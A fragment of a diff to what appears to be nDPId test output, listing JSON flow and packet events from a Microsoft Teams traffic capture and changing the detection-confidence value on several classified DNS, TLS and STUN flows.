00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1587041691075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041691075,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZLy0AAP8RCQ\/AqAEGwKgBAfWPADUARdrUdPIBAAABAAAAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1587041691148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1587041691148,"pkt":"KDc3AG3IEBMx8Tl2CABFAACQrGdAADkREZ7AqAEBwKgBBgA19Y8AfAAAdPKBgAABAAIAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAADwAGw9tc2dhcGktcHJvZC1zZnIIY2xvdWRhcHDANMBJAAEAAQAAAAoABDRybAg="} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041691149,"flow_last_seen":1587041691190,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1662,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1587041691190,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} 
@@ -381,8 +387,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} 
-01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":200000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -391,43 +397,45 @@ 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1587041693475,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1587041693475,"pkt":"KDc3AG3IEBMx8Tl2CABFAADdNJMAAGwR1dQ0ck2IwKgBBg2WyeEAyV65B51cqyKYlOqfHC4eUj71t0+3OzD2kNc2OfFPQNt7fwvuOZltdCnrcr0l94iSgE3VeMj4bdDb+vZ+CObqTNO+QGlUnkV8bcknbNvGUx42nvxp8mhw\/srnkVApKnhDe\/uy29skE82ON2NOubAQd6VBKyo6DT6MaE1A1qjybrSe5XwDrj8OJ1EA\/FUFx\/b063Ar395Oi1sw+DBTZ16KUXaymVRCSFNXRrfz6yWlsSmdtxTLQfpVrW5dlejTUGgaSVxvSg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1587041693515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693515,"pkt":"EBMx8Tl2KDc3AG3ICABFAABg5p0AAEARo1PAqAEGNHL6e8NgDZYATAKlAAMAMCESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 